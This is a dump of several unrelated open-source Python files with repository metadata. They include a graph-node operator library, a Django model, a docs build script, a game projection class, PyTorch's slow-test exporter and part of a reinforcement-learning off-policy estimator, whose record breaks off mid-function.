node_list = list(self.nodes.items())
node_list.insert(idx, (node.name, node))
self.nodes = Graph(node_list)
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
class EvaluationError(RuntimeError):
"""
Failed to evaluate an node.
"""
class var_index(Node): # pylint: disable=C0103,W0223
"""
Node representing values of a variable corresponding to input index values.
Parameters
----------
var : Node
The multi-dimensional variable used for indexing into.
idx : tuple
Tuple of either integer values or index/index_op nodes.
"""
def __init__(self, var, idx, name=None, **kwargs): # pylint: disable=W0235
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
else:
domain = Domain(idx)
super(var_index, self).__init__(var, idx, name=name, domain=domain, **kwargs)
@property
def domain(self):
return self.kwargs["domain"]
@property
def var(self):
var, index_list = self.args
return var
def set_name(self, name):
"""
Set the name for a variable index, making sure to replicate the new name with
a unique stringwhich corresponds to the variable, index combination.
Parameters
----------
value : str
Unique name of the node.
Returns
-------
self : Node
This node.
Raises
------
ValueError
If an node with `value` already exists in the associated graph.
KeyError
If the current name of the node cannot be found in the associated graph.
"""
# TODO: Need a way to check if the existing node is not equal to the current ndoe as ewll
if self.graph and name in self.graph.nodes:
raise ValueError(f"duplicate name '{name}' in {self.graph.name}:"
f"Existing: {self.graph.nodes[name].args}\n"
f"New: {self.args}")
if self.graph:
graph = self.graph
if self._name is not None and self._name in graph.nodes:
graph.update_graph_key(self._name, name)
else:
graph.nodes[name] = self
self._name = name
return self
def __getitem__(self, key):
if self.is_shape_finalized() and len(self.nodes) >= np.prod(self.shape):
if isinstance(key, Integral):
key = tuple([key])
idx = np.ravel_multi_index(key, dims=self.shape, order='C')
ret = self.nodes.item_by_index(idx)
return ret
else:
if isinstance(key, (list)):
ret = var_index(self.var, tuple(key), graph=self)
elif isinstance(key, tuple):
ret = var_index(self.var, key, graph=self)
else:
ret = var_index(self.var, tuple([key]), graph=self)
return ret
def is_scalar(self, val=None):
if val is not None and (not isinstance(val, np.ndarray) or (len(val.shape) == 1 and val.shape[0] == 1)):
if self.var.shape != DEFAULT_SHAPES[0] and (len(self.var.shape) == 1 and not isinstance(self.var.shape[0],Node)):
raise ValueError(f"Invalid shape var for var index {self} with variable shape {self.var.shape}")
return True
else:
return self.var.shape == DEFAULT_SHAPES[0]
def _evaluate(self, var, indices, **kwargs):
if self.is_scalar(var):
out_shape = (1,)
indices = (0,)
single = True
else:
out_shape = self.domain.shape_from_indices(indices)
indices = self.domain.compute_pairs()
single = False
if isinstance(var, (Integral, Real, str)):
var = np.asarray([var])
elif not isinstance(var, (np.ndarray, list)):
raise TypeError(f"Variable {var} with type {type(var)} is not a list or numpy array, and cannot be sliced for {self.name}")
elif isinstance(var, list):
var = np.asarray(var)
if len(var.shape) != len(out_shape) and np.prod(var.shape) == np.prod(out_shape):
if len(out_shape) > len(var.shape):
for i in range(len(out_shape)):
if out_shape[i] == 1:
var = np.expand_dims(var, axis=i)
else:
var = np.squeeze(var)
if len(var.shape) != len(out_shape) and np.prod(var.shape) != np.prod(out_shape):
raise ValueError(f"Index list does not match {var.shape} in {self.var.name} - {self.var.op_name}"
f"dimensions for slice {self.args[0].name} with {out_shape}.\n"
f"Domain: {self.domain}\n"
f"Eval Stack: {Node._eval_stack}")
if not single and not all([(idx_val - 1) >= indices[-1][idx] for idx, idx_val in enumerate(var.shape)]):
raise ValueError(f"var_index {self.name} has indices which are greater than the variable shape:\n"
f"\tArgs: {self.args}\n"
f"\tVar shape: {var.shape}\n"
f"\tNode shape: {self.var.shape}\n"
f"\tIndex Upper bounds: {indices[-1]}")
indices = list(map(lambda x: x.tolist() if isinstance(x, np.ndarray) else x, indices))
res = var[indices] if single else np.asarray([var[idx] for idx in indices]).reshape(out_shape)
if out_shape == (1,) and len(indices) == 1:
res = res[0]
self.domain.set_computed(out_shape, indices)
return res
def __add__(self, other):
return slice_op(operator.add, self, other, graph=self.graph)
def __radd__(self, other):
return slice_op(operator.add, other, self, graph=self.graph)
def __sub__(self, other):
return slice_op(operator.sub, self, other, graph=self.graph)
def __rsub__(self, other):
return slice_op(operator.sub, other, self, graph=self.graph)
def __pow__(self, other):
return slice_op(builtins.pow, self, other, graph=self.graph)
def __rpow__(self, other):
return slice_op(builtins.pow, other, self, graph=self.graph)
def __mul__(self, other):
return slice_op(operator.mul, self, other, graph=self.graph)
def __rmul__(self, other):
return slice_op(operator.mul, other, self, graph=self.graph)
def __truediv__(self, other):
return slice_op(operator.truediv, self, other, graph=self.graph)
def __rtruediv__(self, other):
return slice_op(operator.truediv, other, self, graph=self.graph)
def __floordiv__(self, other):
return slice_op(operator.floordiv, self, other, graph=self.graph)
def __rfloordiv__(self, other):
return slice_op(operator.floordiv, other, self, graph=self.graph)
def __mod__(self, other):
return slice_op(operator.mod, self, other, graph=self.graph)
def __rmod__(self, other):
return slice_op(operator.mod, other, self, graph=self.graph)
def __lshift__(self, other):
return slice_op(operator.lshift, self, other, graph=self.graph)
def __rlshift__(self, other):
return slice_op(operator.lshift, other, self, graph=self.graph)
def __rshift__(self, other):
return slice_op(operator.rshift, self, other, graph=self.graph)
def __rrshift__(self, other):
return slice_op(operator.rshift, other, self, graph=self.graph)
def __and__(self, other):
return slice_op(operator.and_, self, other, graph=self.graph)
def __rand__(self, other):
return slice_op(operator.and_, other, self, graph=self.graph)
def __or__(self, other):
return slice_op(operator.or_, self, other, graph=self.graph)
def __ror__(self, other):
return slice_op(operator.or_, other, self, graph=self.graph)
def __xor__(self, other):
return slice_op(operator.xor, self, other, graph=self.graph)
def __rxor__(self, other):
return slice_op(operator.xor, other, self, graph=self.graph)
def __lt__(self, other):
return slice_op(operator.lt, self, other, graph=self.graph)
def __le__(self, other):
return slice_op(operator.lt, other, self, graph=self.graph)
def __ne__(self, other):
return slice_op(operator.ne, self, other, graph=self.graph)
def __gt__(self, other):
return slice_op(operator.gt, self, other, graph=self.graph)
def __ge__(self, other):
return slice_op(operator.ge, self, other, graph=self.graph)
def __repr__(self):
return "<var_index name=%s, index=%s>" % (self.name, self.args)
class slice_op(Node):
"""
Node representing multi-dimensional operations performed on a node.
Parameters
----------
target : cal
The multi-dimensional variable used for indexing into.
idx : tuple
Tuple of either integer values or index/index_op nodes.
"""
def __init__(self, target, *args, **kwargs):
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
else:
all_args = _flatten_iterable(args)
slice1_var, slice1_idx, slice2_var, slice2_idx = self.get_index_nodes(all_args[0], all_args[1])
domain = slice1_idx.combine_set_domains(slice2_idx)
if "op_name" in kwargs:
kwargs.pop("op_name")
target_name = f"{target.__module__}.{target.__name__}"
super(slice_op, self).__init__(*args, target=target_name, domain=domain, op_name=f"slice_{target.__name__}", **kwargs)
self.target = target
@property
def domain(self):
return self.kwargs["domain"]
def __getitem__(self, key):
if isinstance(key, (tuple, list, np.ndarray)) and len(key) == 0:
return self
elif self.is_shape_finalized() and len(self.nodes) > 0:
if isinstance(key, (int, Node)):
key = tuple([key])
if len(key) != len(self.shape):
raise KeyError(f"Invalid key shape for {self.name}:\n"
f"Shape: {self.shape}\n"
f"Key: {key}")
name = f"{self.name}{key}"
if name not in self.nodes.keys():
raise KeyError(f"{name} not in {self.name} keys:\n"
f"Node keys: {list(self.nodes.keys())}")
ret = self.nodes[name]
return ret
else:
name = []
if isinstance(key, Node):
name.append(key.name)
elif hasattr(key, "__len__") and not isinstance(key, str):
for k in key:
if isinstance(k, Node):
name.append(k.name)
else:
name.append(str(k))
else:
name.append(key)
name = self.var.name + "[" + "][".join(name) + "]"
if name in self.graph.nodes:
return self.graph.nodes[name]
elif isinstance(key, (list)):
return var_index(self, key, name=name, graph=self.graph)
elif isinstance(key, tuple):
return var_index(self, list(key), name=name, graph=self.graph)
else:
return var_index(self, [key], name=name, graph=self.graph)
def set_shape(self, shape=None, init=False):
s = []
assert isinstance(shape, (tuple, list))
if all([isinstance(sv, Integral) for sv in shape]) and len(self.domain) == np.product(shape) and len(shape) > 0:
self._shape = shape if isinstance(shape, tuple) else tuple(shape)
else:
for idx, d in enumerate(self.domain.dom_set):
if shape and isinstance(shape[idx], (func_op, Integral)):
s.append(shape[idx])
elif shape and isinstance(shape[idx], float):
s.append(int(shape[idx]))
elif isinstance(d, float):
s.append(int(d))
elif isinstance(d, var_index):
s.append(d.domain)
else:
s.append(d)
self._shape = tuple(s)
def is_scalar(self, val):
return not isinstance(val, np.ndarray) or (len(val.shape) == 1 and val.shape[0] == 1)
def _evaluate(self, op1, op2, context=None, **kwargs):
if self.is_scalar(op1) or self.is_scalar(op2):
value = self.target(op1, op2)
else:
arg0_dom = self.args[0].domain
arg1_dom = self.args[1].domain
op1_idx = self.domain.map_sub_domain(arg0_dom) if isinstance(self.args[0], Node) else tuple([])
op2_idx = self.domain.map_sub_domain(arg1_dom) if isinstance(self.args[1], Node) else tuple([])
op1 = np.asarray(list(map(lambda x: op1[x], op1_idx))).reshape(self.domain.computed_shape)
op2 = np.asarray(list(map(lambda x: op2[x], op2_idx))).reshape(self.domain.computed_shape)
value = self.target(op1, op2)
return value
def get_index_nodes(self, slice1_var=None, slice2_var=None):
if slice1_var is None and slice2_var is None:
slice1_var, slice2_var = self.args
if isinstance(slice1_var, (slice_op, var_index)) or _is_node_type_instance(slice1_var, "GroupNode"):
slice1_idx = slice1_var.domain
elif _is_node_type_instance(slice1_var, "index"):
slice1_idx = slice1_var.domain
else:
slice1_idx = Domain(tuple([]))
if isinstance(slice2_var, (slice_op, var_index)) or _is_node_type_instance(slice2_var, "GroupNode"):
slice2_idx = slice2_var.domain
elif _is_node_type_instance(slice2_var, "index"):
slice2_idx = slice2_var.domain
else:
slice2_idx = Domain(tuple([]))
return slice1_var, slice1_idx, slice2_var, slice2_idx
def __add__(self, other):
return slice_op(operator.add, self, other, graph=self.graph)
def __radd__(self, other):
return slice_op(operator.add, other, self, graph=self.graph)
def __sub__(self, other):
return slice_op(operator.sub, self, other, graph=self.graph)
def __rsub__(self, other):
return slice_op(operator.sub, other, self, graph=self.graph)
def __pow__(self, other):
return slice_op(builtins.pow, self, other, graph=self.graph)
def __rpow__(self, other):
return slice_op(builtins.pow, other, self, graph=self.graph)
def __mul__(self, other):
return slice_op(operator.mul, self, other, graph=self.graph)
def __rmul__(self, other):
return slice_op(operator.mul, other, self, graph=self.graph)
def __truediv__(self, other):
return slice_op(operator.truediv, self, other, graph=self.graph)
def __rtruediv__(self, other):
return slice_op(operator.truediv, other, self, graph=self.graph)
def __floordiv__(self, other):
return slice_op(operator.floordiv, self, other, graph=self.graph)
def __rfloordiv__(self, other):
return slice_op(operator.floordiv, other, self, graph=self.graph)
def __mod__(self, other):
return slice_op(operator.mod, self, other, graph=self.graph)
def __rmod__(self, other):
return slice_op(operator.mod, other, self, graph=self.graph)
def __lshift__(self, other):
return slice_op(operator.lshift, self, other, graph=self.graph)
def __rlshift__(self, other):
return slice_op(operator.lshift, other, self, graph=self.graph)
def __rshift__(self, other):
return slice_op(operator.rshift, self, other, graph=self.graph)
def __rrshift__(self, other):
return slice_op(operator.rshift, other, self, graph=self.graph)
def __and__(self, other):
return slice_op(operator.and_, self, other, graph=self.graph)
def __rand__(self, other):
return slice_op(operator.and_, other, self, graph=self.graph)
def __or__(self, other):
return slice_op(operator.or_, self, other, graph=self.graph)
def __ror__(self, other):
return slice_op(operator.or_, other, self, graph=self.graph)
def __xor__(self, other):
return slice_op(operator.xor, self, other, graph=self.graph)
def __rxor__(self, other):
return slice_op(operator.xor, other, self, graph=self.graph)
def __lt__(self, other):
return slice_op(operator.lt, self, other, graph=self.graph)
def __le__(self, other):
return slice_op(operator.lt, other, self, graph=self.graph)
def __ne__(self, other):
return slice_op(operator.ne, self, other, graph=self.graph)
def __gt__(self, other):
return slice_op(operator.gt, self, other, graph=self.graph)
def __ge__(self, other):
return slice_op(operator.ge, self, other, graph=self.graph)
def __repr__(self):
return "<slice_%s '%s'>" % (self.target.__name__, self.name)
class func_op(Node): # pylint: disable=C0103,R0903
"""
Node wrapper for stateless functions.
Parameters
----------
target : callable
function to evaluate the node
args : tuple
positional arguments passed to the target
kwargs : dict
keywoard arguments passed to the target
"""
def __init__(self, target, *args, **kwargs):
kwargs["op_name"] = kwargs["op_name"] if "op_name" in kwargs \
else f"{target.__name__}"
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
elif len(args) == 2:
all_args = _flatten_iterable(args)
slice1_var, slice1_idx, slice2_var, slice2_idx = self.get_index_nodes(all_args[0], all_args[1])
domain = slice1_idx.combine_set_domains(slice2_idx)
else:
domain = Domain(tuple([]))
self._target = None
super(func_op, self).__init__(*args, target=f"{target.__module__}.{target.__name__}", domain=domain, **kwargs)
self.target = target
self.added_attrs += ["domain", "target"]
@property
def target(self):
return self._target
@target.setter
def target(self, fnc):
self._target = fnc
self.op_name = f"{fnc.__name__}"
self.kwargs["target"] = f"{fnc.__module__}.{fnc.__name__}"
def __getitem__(self, key):
return self
@property
def domain(self):
return self.kwargs["domain"]
def get_index_nodes(self, slice1_var=None, slice2_var=None):
if slice1_var is None and slice2_var is None:
slice1_var, slice2_var = self.args
if isinstance(slice1_var, (slice_op, var_index)) or _is_node_type_instance(slice1_var, "GroupNode"):
slice1_idx = slice1_var.domain
else:
slice1_idx = Domain(tuple([]))
if isinstance(slice2_var, (slice_op, var_index)) or _is_node_type_instance(slice2_var, "GroupNode"):
slice2_idx = slice2_var.domain
else:
slice2_idx = Domain(tuple([]))
return slice1_var, slice1_idx, slice2_var, slice2_idx
def _evaluate(self, *args, **kwargs):
for aa in list(kwargs.keys()):
if aa in self.added_attrs:
kwargs.pop(aa)
return self.target(*args, **kwargs)
def __call__(self, *args, **kwargs):
return call(self, *args, **kwargs)
def __repr__(self):
return "<func_op '%s' target=%s args=<%d items>>" % \
(self.name, self.kwargs["target"], len(self.args))
def nodeop(target=None, **kwargs):
"""
Decorator for creating nodes from functions.
"""
# This is called when the decorator is used with arguments
if target is None:
return functools.partial(nodeop, **kwargs)
# This is called when the decorator is used without arguments
@functools.wraps(target)
def _wrapper(*args, **kwargs_inner):
return func_op(target, *args, **kwargs_inner, **kwargs)
return _wrapper
@nodeop
def call(func, *args, **kwargs):
"""
Call `func` with positional arguments `args` and keyword arguments `kwargs`.
Parameters
----------
func : callable
Function to call when the node is executed.
args : list
Sequence of positional arguments passed to `func`.
kwargs : dict
Mapping of keyword arguments passed to `func`.
"""
return func(*args, **kwargs)
@contextlib.contextmanager
def control_dependencies(dependencies, graph=None):
"""
Ensure that all `dependencies` are executed before any nodes in this scope.
Parameters
----------
dependencies : list
Sequence of nodes to be evaluted before evaluating any nodes defined in this
scope.
"""
# Add dependencies to the graph
graph = Node.get_active_graph(graph)
graph.dependencies.extend(dependencies)
yield
# Remove dependencies from the graph
del graph.dependencies[-len(dependencies):]
#pylint: disable=C0103
abs_ = nodeop(builtins.abs)
dict_ = nodeop(builtins.dict)
help_ = nodeop(builtins.help)
min_ = nodeop(builtins.min)
setattr_ = nodeop(builtins.setattr)
all_ = nodeop(builtins.all)
dir_ = nodeop(builtins.dir)
hex_ = nodeop(builtins.hex)
next_ = nodeop(builtins.next)
slice_ = nodeop(builtins.slice)
any_ = nodeop(builtins.any)
divmod_ = nodeop(builtins.divmod)
id_ = nodeop(builtins.id)
object_ = nodeop(builtins.object)
sorted_ = nodeop(builtins.sorted)
ascii_ = nodeop(builtins.ascii)
enumerate_ = nodeop(builtins.enumerate)
input_ = nodeop(builtins.input)
oct_ = nodeop(builtins.oct)
staticmethod_ = nodeop(builtins.staticmethod)
bin_ = nodeop(builtins.bin)
eval_ = nodeop(builtins.eval)
int_ = nodeop(builtins.int)
open_ = nodeop(builtins.open)
str_ = nodeop(builtins.str)
bool_ = nodeop(builtins.bool)
exec_ = nodeop(builtins.exec)
isinstance_ = nodeop(builtins.isinstance)
ord_ = nodeop(builtins.ord)
sum_ = nodeop(builtins.sum)
bytearray_ = nodeop(builtins.bytearray)
filter_ = nodeop(builtins.filter)
issubclass_ = nodeop(builtins.issubclass)
pow_ = nodeop(builtins.pow)
super_ = nodeop(builtins.super)
bytes_ = nodeop(builtins.bytes)
float_ = nodeop(builtins.float)
iter_ = nodeop(builtins.iter)
print_ = nodeop(builtins.print)
tuple_ = nodeop(builtins.tuple)
callable_ = nodeop(builtins.callable)
format_ = nodeop(builtins.format)
len_ = nodeop(builtins.len)
property_ = nodeop(builtins.property)
type_ = nodeop(builtins.type)
chr_ = nodeop(builtins.chr)
frozenset_ = nodeop(builtins.frozenset)
list_ = nodeop(builtins.list)
range_ = nodeop(builtins.range)
vars_ = nodeop(builtins.vars)
classmethod_ = nodeop(builtins.classmethod)
getattr_ = nodeop(builtins.getattr)
locals_ = nodeop(builtins.locals)
repr_ = nodeop(builtins.repr)
zip_ = nodeop(builtins.zip)
compile_ = nodeop(builtins.compile)
globals_ = nodeop(builtins.globals)
map_ = nodeop(builtins.map)
reversed_ = nodeop(builtins.reversed)
complex_ = nodeop(builtins.complex)
hasattr_ = nodeop(builtins.hasattr)
max_ = nodeop(builtins.max)
round_ = nodeop(builtins.round)
delattr_ = nodeop(builtins.delattr)
hash_ = nodeop(builtins.hash)
memoryview_ = nodeop(builtins.memoryview)
set_ = nodeop(builtins.set)
add = nodeop(operator.add)
and_ = nodeop(operator.and_)
attrgetter = nodeop(operator.attrgetter)
concat = nodeop(operator.concat)
contains = nodeop(operator.contains)
countOf = nodeop(operator.countOf)
delitem = nodeop(operator.delitem)
eq = nodeop(operator.eq)
floordiv = nodeop(operator.floordiv)
ge = nodeop(operator.ge)
getitem = nodeop(operator.getitem)
gt = nodeop(operator.gt)
index = nodeop(operator.index)
indexOf = nodeop(operator.indexOf)
inv = nodeop(operator.inv)
invert = nodeop(operator.invert)
ior = nodeop(operator.ior)
ipow = nodeop(operator.ipow)
irshift = nodeop(operator.irshift)
is_ = nodeop(operator.is_)
is_not = nodeop(operator.is_not)
itemgetter = nodeop(operator.itemgetter)
le = nodeop(operator.le)
length_hint = nodeop(operator.length_hint)
lshift = nodeop(operator.lshift)
lt = nodeop(operator.lt)
matmul = nodeop(operator.matmul)
methodcaller = nodeop(operator.methodcaller)
mod = nodeop(operator.mod)
mul = nodeop(operator.mul)
ne = nodeop(operator.ne)
neg = nodeop(operator.neg)
not_ = nodeop(operator.not_)
or_ = nodeop(operator.or_)
pos = nodeop(operator.pos)
rshift = nodeop(operator.rshift)
setitem = nodeop(operator.setitem)
sub = nodeop(operator.sub)
truediv = nodeop(operator.truediv)
truth = nodeop(operator.truth)
xor = nodeop(operator.xor)
import_ = nodeop(importlib.import_module)
| 2.53125 | 3 |
actors/models.py | rngallen/beyond_basics | 0 | 3475 | <gh_stars>0
from django.db import models
from django.utils.translation import ugettext_lazy as _
# Create your models here.
class Actor(models.Model):
name = models.CharField(_("name"), max_length=200)
# if is_star he/she will be directed to hollywood else directed to commercial
is_star = models.BooleanField(_("is start"), default=False)
def __str__(self):
return self.name
| 2.53125 | 3 |
docs/buildscripts/docs.py | cwlalyy/mongo-c-driver | 13 | 3476 | """Build the C client docs.
"""
from __future__ import with_statement
import os
import shutil
import socket
import subprocess
import time
import urllib2
def clean_dir(dir):
try:
shutil.rmtree(dir)
except:
pass
os.makedirs(dir)
def gen_api(dir):
clean_dir(dir)
clean_dir("docs/source/doxygen")
with open(os.devnull, 'w') as null:
subprocess.call(["doxygen", "doxygenConfig"], stdout=null, stderr=null)
os.rename("docs/source/doxygen/html", dir)
def gen_sphinx(dir):
clean_dir(dir)
os.chdir("docs/source/sphinx")
with open(os.devnull, 'w') as null:
subprocess.call(["make", "html"], stdout=null, stderr=null)
os.chdir("../../../")
if os.path.isdir("docs/source/sphinx/build/html"):
os.rename("docs/source/sphinx/build/html", dir)
def version():
"""Get the driver version from doxygenConfig.
"""
with open("doxygenConfig") as f:
for line in f.readlines():
if line.startswith("PROJECT_NUMBER"):
return line.split("=")[1].strip()
def main():
print("Generating Sphinx docs in docs/html")
gen_sphinx("docs/html")
print("Generating Doxygen docs in docs/html/api")
gen_api("docs/html/api")
if __name__ == "__main__":
main()
| 2.484375 | 2 |
tilegame/render/rs.py | defgsus/thegame | 1 | 3477 | import glm
import math
from lib.opengl import RenderSettings
class GameProjection:
def __init__(self, rs: "GameRenderSettings"):
self.rs = rs
self.scale = 10.
self.rotation_deg = 0.
self.location = glm.vec3(0)
self._stack = []
def projection_matrix_4(self) -> glm.mat4:
scale = 1.
ratio = self.rs.render_width / self.rs.render_height
m = glm.ortho(-scale * ratio, scale * ratio, -scale, scale, -10, 10)
return m
def transformation_matrix_4(self) -> glm.mat4:
m = glm.rotate(
glm.mat4(1), -self.rotation_deg / 180 * glm.pi(), glm.vec3(0, 0, 1)
)
m = m * glm.scale(glm.mat4(), glm.vec3(2. / self.scale))
m = m * glm.translate(glm.mat4(), glm.vec3(-self.location.x, -self.location.y, 0))
return m
def transformation_matrix(self) -> glm.mat3:
m = rotation_matrix_2d(self.rotation_deg)
m *= self.scale * .5
m[2][0] = self.location.x
m[2][1] = self.location.y
return m
def push(self):
self._stack.append({
"scale": self.scale,
"rotation": self.rotation_deg,
"location": self.location.__copy__(),
})
def pop(self):
s = self._stack.pop(-1)
self.scale = s["scale"]
self.rotation_deg = s["rotation"]
self.location = s["location"]
def __enter__(self):
self.push()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.pop()
def rotation_matrix_2d(degree: float) -> glm.mat3:
a = degree / 180. * math.pi
sa = math.sin(a)
ca = math.cos(a)
return glm.mat3(
ca, sa, 0,
-sa, ca, 0,
0, 0, 1
)
class GameRenderSettings(RenderSettings):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.projection = GameProjection(self)
| 2.390625 | 2 |
tools/stats/export_slow_tests.py | stungkit/pytorch | 2 | 3478 | <gh_stars>1-10
#!/usr/bin/env python3
import argparse
import json
import os
import statistics
from collections import defaultdict
from tools.stats.s3_stat_parser import (
get_previous_reports_for_branch,
Report,
Version2Report,
)
from typing import cast, DefaultDict, Dict, List, Any
from urllib.request import urlopen
SLOW_TESTS_FILE = ".pytorch-slow-tests.json"
SLOW_TEST_CASE_THRESHOLD_SEC = 60.0
RELATIVE_DIFFERENCE_THRESHOLD = 0.1
IGNORED_JOBS = ["asan", "periodic"]
def get_test_case_times() -> Dict[str, float]:
reports: List[Report] = get_previous_reports_for_branch("origin/viable/strict", "")
# an entry will be like ("test_doc_examples (__main__.TestTypeHints)" -> [values]))
test_names_to_times: DefaultDict[str, List[float]] = defaultdict(list)
for report in reports:
if report.get("format_version", 1) != 2: # type: ignore[misc]
raise RuntimeError("S3 format currently handled is version 2 only")
v2report = cast(Version2Report, report)
if any(job_name in str(report["build_job"]) for job_name in IGNORED_JOBS):
continue
for test_file in v2report["files"].values():
for suitename, test_suite in test_file["suites"].items():
for casename, test_case in test_suite["cases"].items():
# The below attaches a __main__ as that matches the format of test.__class__ in
# common_utils.py (where this data will be used), and also matches what the output
# of a running test would look like.
name = f"{casename} (__main__.{suitename})"
succeeded: bool = test_case["status"] is None
if succeeded:
test_names_to_times[name].append(test_case["seconds"])
return {
test_case: statistics.mean(times)
for test_case, times in test_names_to_times.items()
}
def filter_slow_tests(test_cases_dict: Dict[str, float]) -> Dict[str, float]:
return {
test_case: time
for test_case, time in test_cases_dict.items()
if time >= SLOW_TEST_CASE_THRESHOLD_SEC
}
def get_test_infra_slow_tests() -> Dict[str, float]:
url = "https://raw.githubusercontent.com/pytorch/test-infra/generated-stats/stats/slow-tests.json"
contents = urlopen(url, timeout=1).read().decode("utf-8")
return cast(Dict[str, float], json.loads(contents))
def too_similar(
calculated_times: Dict[str, float], other_times: Dict[str, float], threshold: float
) -> bool:
# check that their keys are the same
if calculated_times.keys() != other_times.keys():
return False
for test_case, test_time in calculated_times.items():
other_test_time = other_times[test_case]
relative_difference = abs(
(other_test_time - test_time) / max(other_test_time, test_time)
)
if relative_difference > threshold:
return False
return True
def export_slow_tests(options: Any) -> None:
filename = options.filename
if os.path.exists(filename):
print(f"Overwriting existent file: {filename}")
with open(filename, "w+") as file:
slow_test_times: Dict[str, float] = filter_slow_tests(get_test_case_times())
if options.ignore_small_diffs:
test_infra_slow_tests_dict = get_test_infra_slow_tests()
if too_similar(
slow_test_times, test_infra_slow_tests_dict, options.ignore_small_diffs
):
slow_test_times = test_infra_slow_tests_dict
json.dump(
slow_test_times, file, indent=" ", separators=(",", ": "), sort_keys=True
)
file.write("\n")
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Export a JSON of slow test cases in PyTorch unit test suite"
)
parser.add_argument(
"-f",
"--filename",
nargs="?",
type=str,
default=SLOW_TESTS_FILE,
const=SLOW_TESTS_FILE,
help="Specify a file path to dump slow test times from previous S3 stats. Default file path: .pytorch-slow-tests.json",
)
parser.add_argument(
"--ignore-small-diffs",
nargs="?",
type=float,
const=RELATIVE_DIFFERENCE_THRESHOLD,
help="Compares generated results with stats/slow-tests.json in pytorch/test-infra. If the relative differences "
"between test times for each test are smaller than the threshold and the set of test cases have not "
"changed, we will export the stats already in stats/slow-tests.json. Else, we will export the calculated "
"results. The default threshold is 10%.",
)
return parser.parse_args()
def main() -> None:
options = parse_args()
export_slow_tests(options)
if __name__ == "__main__":
main()
| 2.25 | 2 |
ml/rl/evaluation/weighted_sequential_doubly_robust_estimator.py | michaeltashman/Horizon | 1 | 3479 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import itertools
import logging
import numpy as np
import scipy as sp
import torch
from ml.rl.evaluation.cpe import CpeEstimate
from ml.rl.evaluation.evaluation_data_page import EvaluationDataPage
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class WeightedSequentialDoublyRobustEstimator:
NUM_SUBSETS_FOR_CB_ESTIMATES = 25
CONFIDENCE_INTERVAL = 0.9
NUM_BOOTSTRAP_SAMPLES = 50
BOOTSTRAP_SAMPLE_PCT = 0.5
def __init__(self, gamma):
self.gamma = gamma
def estimate(
self,
edp: EvaluationDataPage,
num_j_steps,
whether_self_normalize_importance_weights,
) -> CpeEstimate:
# For details, visit https://arxiv.org/pdf/1604.00923.pdf Section 5, 7, 8
(
actions,
rewards,
logged_propensities,
target_propensities,
estimated_q_values,
) = WeightedSequentialDoublyRobustEstimator.transform_to_equal_length_trajectories(
edp.mdp_id,
edp.action_mask.cpu().numpy(),
edp.logged_rewards.cpu().numpy().flatten(),
edp.logged_propensities.cpu().numpy().flatten(),
edp.model_propensities.cpu().numpy(),
edp.model_values.cpu().numpy(),
)
num_trajectories = actions.shape[0]
trajectory_length = actions.shape[1]
j_steps = [float("inf")]
if num_j_steps > 1:
j_steps.append(-1)
if num_j_steps > 2:
interval = trajectory_length // (num_j_steps - 1)
j_steps.extend([i * interval for i in range(1, num_j_steps - 1)])
target_propensity_for_logged_action = np.sum(
np.multiply(target_propensities, actions), axis=2
)
estimated_q_values_for_logged_action = np.sum(
np.multiply(estimated_q_values, actions), axis=2
)
estimated_state_values = np.sum(
np.multiply(target_propensities, estimated_q_values), axis=2
)
importance_weights = target_propensity_for_logged_action / logged_propensities
importance_weights = np.cumprod(importance_weights, axis=1)
importance_weights = WeightedSequentialDoublyRobustEstimator.normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
)
importance_weights_one_earlier = (
np.ones([num_trajectories, 1]) * 1.0 / num_trajectories
)
importance_weights_one_earlier = np.hstack(
[importance_weights_one_earlier, importance_weights[:, :-1]]
)
discounts = np.logspace(
start=0, stop=trajectory_length - 1, num=trajectory_length, base=self.gamma
)
j_step_return_trajectories = []
for j_step in j_steps:
j_step_return_trajectories.append(
WeightedSequentialDoublyRobustEstimator.calculate_step_return(
rewards,
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values,
estimated_q_values_for_logged_action,
j_step,
)
)
j_step_return_trajectories = np.array(j_step_return_trajectories)
j_step_returns = np.sum(j_step_return_trajectories, axis=1)
if len(j_step_returns) == 1:
weighted_doubly_robust = j_step_returns[0]
weighted_doubly_robust_std_error = 0.0
else:
# break trajectories into several subsets to estimate confidence bounds
infinite_step_returns = []
num_subsets = int(
min(
num_trajectories / 2,
WeightedSequentialDoublyRobustEstimator.NUM_SUBSETS_FOR_CB_ESTIMATES,
)
)
interval = num_trajectories / num_subsets
for i in range(num_subsets):
trajectory_subset = np.arange(
int(i * interval), int((i + 1) * interval)
)
importance_weights = (
target_propensity_for_logged_action[trajectory_subset]
/ logged_propensities[trajectory_subset]
)
importance_weights = np.cumprod(importance_weights, axis=1)
importance_weights = WeightedSequentialDoublyRobustEstimator.normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
)
importance_weights_one_earlier = (
np.ones([len(trajectory_subset), 1]) * 1.0 / len(trajectory_subset)
)
importance_weights_one_earlier = np.hstack(
[importance_weights_one_earlier, importance_weights[:, :-1]]
)
infinite_step_return = np.sum(
WeightedSequentialDoublyRobustEstimator.calculate_step_return(
rewards[trajectory_subset],
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values[trajectory_subset],
estimated_q_values_for_logged_action[trajectory_subset],
float("inf"),
)
)
infinite_step_returns.append(infinite_step_return)
# Compute weighted_doubly_robust mean point estimate using all data
weighted_doubly_robust = self.compute_weighted_doubly_robust_point_estimate(
j_steps,
num_j_steps,
j_step_returns,
infinite_step_returns,
j_step_return_trajectories,
)
# Use bootstrapping to compute weighted_doubly_robust standard error
bootstrapped_means = []
sample_size = int(
WeightedSequentialDoublyRobustEstimator.BOOTSTRAP_SAMPLE_PCT
* num_subsets
)
for _ in range(
